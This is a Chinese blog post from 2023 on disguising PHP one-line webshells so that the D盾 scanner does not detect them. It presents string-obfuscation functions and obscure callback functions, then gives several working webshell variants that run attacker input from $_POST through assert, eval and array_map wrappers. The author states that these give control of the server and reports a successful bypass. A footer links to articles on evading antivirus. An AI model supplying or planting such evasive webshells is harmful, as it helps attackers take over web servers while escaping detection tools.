首页 > 其他分享 >一句话木马绕过D盾查杀

一句话木马绕过D盾查杀

时间:2023-07-29 15:25:47浏览次数:34  
标签:function 函数 查杀 assert test 木马 字符串 绕过 array

一句话木马绕过D盾查杀

关于eval函数

eval是⼀个语⾔构造器⽽不是⼀个函数,不能被可变函数 调⽤可变函数:通过⼀个变量,获取其对

应的变量值,然后通过给该值增加⼀个括号(),让系统认为该值是⼀个函数,从⽽当做函数来执⾏

通俗的说⽐如你<?php$a=eval;$a()?>这样是不⾏的.也造就了⽤eval的话达不到assert的灵活,但是在php7.1以上assert已经不能使用了。

关于assert函数

assert()回调函数在构建⾃动测试套件的时候尤其有⽤,因为它们允许你简易地捕获传⼊断⾔的代码,并包含断⾔的位置信息。当信息能够被其他⽅法捕获,使⽤断⾔可以让它更快更⽅便!

PHP免杀函数-字符串变形

字符串变形多数用于 BYPASS 安全狗,相当对于 D 盾,安全狗更加重视 ”形“. 一个特殊的变形就能绕过安全狗,看看 PHP 手册,有着很多关于操作字符串的函数

ucwords() //函数把字符串中每个单词的首字符转换为大写。

ucfirst() //函数把字符串中的首字符转换为大写。

trim() //函数从字符串的两端删除空白字符和其他预定义字符。

substr_replace() //函数把字符串的一部分替换为另一个字符串

substr() //函数返回字符串的一部分。

strtr() //函数转换字符串中特定的字符。

strtoupper() //函数把字符串转换为大写。

strtolower() //函数把字符串转换为小写。

strtok() //函数把字符串分割为更小的字符串

str_rot13() //函数对字符串执行 ROT13 编码。

PHP免杀函数-回调函数

call_user_func_array()

call_user_func()

array_filter()

array_walk()

array_map()

registregister_shutdown_function()

register_tick_function()

filter_var()

filter_var_array()

uasort()

uksort()

array_reduce()

array_walk()

array_walk_recursive()

回调函数大部分已经被安全软件加入全家桶套餐 所以找到

一个生僻的不常用的回调函数来执行 比如

<?php

forward_static_call_array(assert,array($_POST[x]));

?>

PHP免杀函数-回调函数变形

前面说过众多回调函数已经被加入豪华套

餐了,怎么绕过呢,其实也很简单 那就是

定义个函数 或者类来调用

定义一个函数

<?php

function test($a,$b){

array_map($a,$b);

}

test(assert,array($_POST['x']));

?>

定义一个类

<?php

class loveme {

var $a;

var $b;

function __construct($a,$b) {

$this->a=$a;

$this->b=$b;

}

function test() {

array_map($this->a,$this->b);

}

}

$p1=new loveme(assert,array($_POST['x']));

$p1->test();

?>

例如

<?php eval($_POST['x'])?>对这一句话木马去进行变形,绕过D盾查杀,利用phpinfo()这个函数来验证是否成功。

此时我们可以输入下面的代码,使上面的木马进行变形,这个代码的作用就是可以让你接触到服务器,然后获得服务器的控制权,就等于完成了渗透操作

<?php

function test($a,$b){

array_map($a,$b);

}

test(eval,array($_POST['x']));

phpinfo();

?>

此时我们再用D盾查杀一下,发现绕过成功

编写人:Kevin 2023.7.29

标签:function,函数,查杀,assert,test,木马,字符串,绕过,array
From: https://www.cnblogs.com/fitfit/p/17589855.html

相关文章

  • Windows 11 绕过 TPM 方法总结,通用免 TPM 镜像下载 (2023 年 7 月更新)
    Windows11绕过TPM方法总结,通用免TPM镜像下载(2023年7月更新)在虚拟机、Mac电脑和TPM不符合要求的旧电脑上安装Windows11的通用方法总结请访问原文链接:https://sysin.org/blog/windows-11-no-tpm/,查看最新版。原创作品,转载请保留出处。作者主页:sysin.org本文......
  • 绕过杀软NetUser的小tips
    在拿了shell上线了的情况下,通过netuseradd新建用户经常会被杀软拦截拒绝访问,以比较常用的火绒和360为例,简单说一下绕过的小tips某绒可以看到通过netuser命令新建用户,火绒拦了,检测的是cmd.exe去执行C:\Windows\System32\net.exe把C:\Windows\System32\net.exe复制出来放到别......
  • Smartbi 身份认证绕过漏洞
    内置账号密码登录因为自己搭建的环境存在一些问题,可能是版本过高的原因,(奇奇怪怪的问题,用户没有权限),所以目前仅仅做概念性验证,对漏洞的原理进行分析。在未登录的情况下访问接口 /smartbi/vision/RMIServlet​我们可以比较明显的看到对应的处理类 CheckIsLoggedFilter​sm......
  • 超级好用的绕过php的disable_functions
    寻思寻思今天就写了吧这里背景是在打同学搭的网站,一句话已经进去了,但是执行不了命令 能够看到能用的函数几乎都被禁了在网上找了挺多方法都用不了,蚁剑的各种插件也绕不过最后找到了这个 哥斯拉的绕过disable中的双链表它的说法是这样的 (来源:http://www.hackdig.com/......
  • css旋转木马代码示例
    <!DOCTYPEhtml><htmllang="en"><head><metacharset="UTF-8"><title>Title</title><style>/*透视*/body{perspective:1000px;}.box{......
  • xss绕过
    httponly如果您在cookie中设置了HttpOnly属性,那么通过js脚本将无法读取到cookie信息,这样能有效的防止XSS攻击。绕过httponly的两种思路:1.浏览器未保存账号密码:需要xss产生登录地址,利用表单劫持。2.浏览器保存账号密码:产生在后台的xss,一般为存储型xss,浏览器读取xss。常见的xss......
  • sliver生成木马.sh
    生成sliver木马多个步骤合成一个sh#!/bin/bash#date:20230222host_ip=$1WORK_DIR=/opt/workrm-rf/root/.sliver-client/cd${WORK_DIR}/sliverrm-rfadjectives.txtbas_192.0.2.1.cfgmuma_x*nouns.txtsliver.dbversionconfigs/database.jsonconfigs/htt......
  • SQL注入绕过
    SQL注入绕过1.大小写绕过SQL语句对大小写不敏感、开发人员做的黑名单过滤过于简单。2.双写绕过双学绕过的原理是后台利用正则匹配到敏感词将其替换为空。例如:selselectect->select3.空格过滤如果遇到空格被过滤了,主要的几个思路都是想办法找一个代替品。能替换空格的有......
  • win10绕过通过microsoft登录
    win10在安装win10时会出现下图中需要通过Microsoft的账户才能登陆系统,假设现在我没有微软的注册账户是不是就意味着我不能使用win10系统,答案是否定的,可以使用本地的用户来使用win10系统方法1改为域加入跳过Microsoft登录方法2断网跳过Microsoft登录直接拔掉网线,安装部......
  • HttpURLConnection绕过SSL验证,信任所有证书的工具类
    HttpURLConnection绕过SSL验证,信任所有证书的工具类发起https请求时经常会出现javax.net.ssl.SSLHandshakeException:java.security.cert.CertificateException这样的错误,那是因为环境中没有证书校验,我们可以在连接中设置绕过SSL校验来解决这个问题。publicclassSslUtil{......